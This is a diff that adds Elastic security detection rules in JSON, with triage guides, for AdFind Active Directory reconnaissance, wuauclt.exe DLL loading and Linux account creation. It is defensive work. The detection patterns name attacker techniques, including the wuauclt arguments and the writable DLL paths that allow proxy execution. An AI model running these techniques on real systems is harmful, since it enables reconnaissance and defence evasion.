Winlogbeat, this rule requires Sysmon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AdFind Command Activity", + "note": "## Triage and analysis\n\n### Investigating AdFind Command Activity\n\n[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information from Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same ways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects and understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of this tool being adopted by ransomware and criminal groups and used in compromises.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line to determine what information was retrieved by the tool.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. It doesn't happen in isolation, so reviewing previous logs/activity from impacted machines can be very telling.\n\n### Related rules\n\n- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1\n- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d\n- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"AdFind.exe\" or ?process.pe.original_file_name == \"AdFind.exe\") and\n process.args : (\"objectcategory=computer\", \"(objectcategory=computer)\",\n \"objectcategory=person\", \"(objectcategory=person)\",\n \"objectcategory=subnet\", \"(objectcategory=subnet)\",\n \"objectcategory=group\", \"(objectcategory=group)\",\n \"objectcategory=organizationalunit\", \"(objectcategory=organizationalunit)\",\n \"objectcategory=attributeschema\", \"(objectcategory=attributeschema)\",\n \"domainlist\", \"dcmodes\", \"adinfo\", \"dclist\", \"computers_pwnotreqd\", \"trustdmp\")\n", + "references": [ + "http://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "eda499b8-a073-4e35-9733-22ec71f57f3a_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_111.json b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_111.json new file mode 100644 index 00000000000..5ebd333808a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eda499b8-a073-4e35-9733-22ec71f57f3a_111.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "AdFind Command Activity", + "note": "## Triage and analysis\n\n### Investigating AdFind Command Activity\n\n[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information from Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same ways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects and understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of this tool being adopted by ransomware and criminal groups and used in compromises.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line to determine what information was retrieved by the tool.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. It doesn't happen in isolation, so reviewing previous logs/activity from impacted machines can be very telling.\n\n### Related rules\n\n- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1\n- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d\n- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"AdFind.exe\" or ?process.pe.original_file_name == \"AdFind.exe\") and\n process.args : (\"objectcategory=computer\", \"(objectcategory=computer)\",\n \"objectcategory=person\", \"(objectcategory=person)\",\n \"objectcategory=subnet\", \"(objectcategory=subnet)\",\n \"objectcategory=group\", \"(objectcategory=group)\",\n \"objectcategory=organizationalunit\", \"(objectcategory=organizationalunit)\",\n \"objectcategory=attributeschema\", \"(objectcategory=attributeschema)\",\n \"domainlist\", \"dcmodes\", \"adinfo\", \"dclist\", \"computers_pwnotreqd\", \"trustdmp\")\n", + "references": [ + "http://www.joeware.net/freetools/tools/adfind/", + "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/", + "subtechnique": [ + { + "id": "T1069.002", + "name": "Domain Groups", + "reference": "https://attack.mitre.org/techniques/T1069/002/" + } + ] + }, + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + }, + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1016", + "name": "System Network Configuration Discovery", + "reference": "https://attack.mitre.org/techniques/T1016/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "eda499b8-a073-4e35-9733-22ec71f57f3a_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_111.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_111.json new file mode 100644 index 00000000000..34154c3c24e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_111.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies abuse of the Windows Update Auto Update Client (wuauclt.exe) to load an arbitrary DLL. This behavior is used as a defense evasion technique to blend-in malicious activity with legitimate Windows software.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ImageLoad via Windows Update Auto Update Client", + "note": "## Triage and analysis\n\n### Investigating ImageLoad via Windows Update Auto Update Client\n\nThe Windows Update Auto Update Client (wuauclt.exe) is the component responsible for managing system updates. However, adversaries may abuse this process to load a malicious DLL and execute malicious code while blending into a legitimate system mechanism. \n\nThis rule identifies potential abuse for code execution by monitoring for specific process arguments (\"/RunHandlerComServer\" and \"/UpdateDeploymentProvider\") and common writable paths where the target DLL can be placed (e.g., \"C:\\Users\\*.dll\", \"C:\\ProgramData\\*.dll\", etc.).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line and identify the DLL location.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name == \"wuauclt.exe\" or process.name : \"wuauclt.exe\") and\n /* necessary windows update client args to load a dll */\n process.args : \"/RunHandlerComServer\" and process.args : \"/UpdateDeploymentProvider\" and\n /* common paths writeable by a standard user where the target DLL can be placed */\n process.args : (\"C:\\\\Users\\\\*.dll\", \"C:\\\\ProgramData\\\\*.dll\", \"C:\\\\Windows\\\\Temp\\\\*.dll\", \"C:\\\\Windows\\\\Tasks\\\\*.dll\")\n", + "references": [ + "https://dtm.uk/wuauclt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_112.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_112.json new file mode 100644 index 00000000000..ca2261d7340 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_112.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies abuse of the Windows Update Auto Update Client (wuauclt.exe) to load an arbitrary DLL. This behavior is used as a defense evasion technique to blend-in malicious activity with legitimate Windows software.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ImageLoad via Windows Update Auto Update Client", + "note": "## Triage and analysis\n\n### Investigating ImageLoad via Windows Update Auto Update Client\n\nThe Windows Update Auto Update Client (wuauclt.exe) is the component responsible for managing system updates. However, adversaries may abuse this process to load a malicious DLL and execute malicious code while blending into a legitimate system mechanism. \n\nThis rule identifies potential abuse for code execution by monitoring for specific process arguments (\"/RunHandlerComServer\" and \"/UpdateDeploymentProvider\") and common writable paths where the target DLL can be placed (e.g., \"C:\\Users\\*.dll\", \"C:\\ProgramData\\*.dll\", etc.).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line and identify the DLL location.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.pe.original_file_name == \"wuauclt.exe\" or process.name : \"wuauclt.exe\") and\n /* necessary windows update client args to load a dll */\n process.args : \"/RunHandlerComServer\" and process.args : \"/UpdateDeploymentProvider\" and\n /* common paths writeable by a standard user where the target DLL can be placed */\n process.args : (\"C:\\\\Users\\\\*.dll\", \"C:\\\\ProgramData\\\\*.dll\", \"C:\\\\Windows\\\\Temp\\\\*.dll\", \"C:\\\\Windows\\\\Tasks\\\\*.dll\")\n", + "references": [ + "https://dtm.uk/wuauclt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_4.json b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_4.json new file mode 100644 index 00000000000..438524525bc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_4.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create new users. Attackers may add new users to establish persistence on a system.", + "from": "now-9m", + "index": [ + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux User Account Creation", + "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "iam where host.os.type == \"linux\" and (event.type == \"user\" and event.type == \"creation\") and\nprocess.name in (\"useradd\", \"adduser\") and user.name != 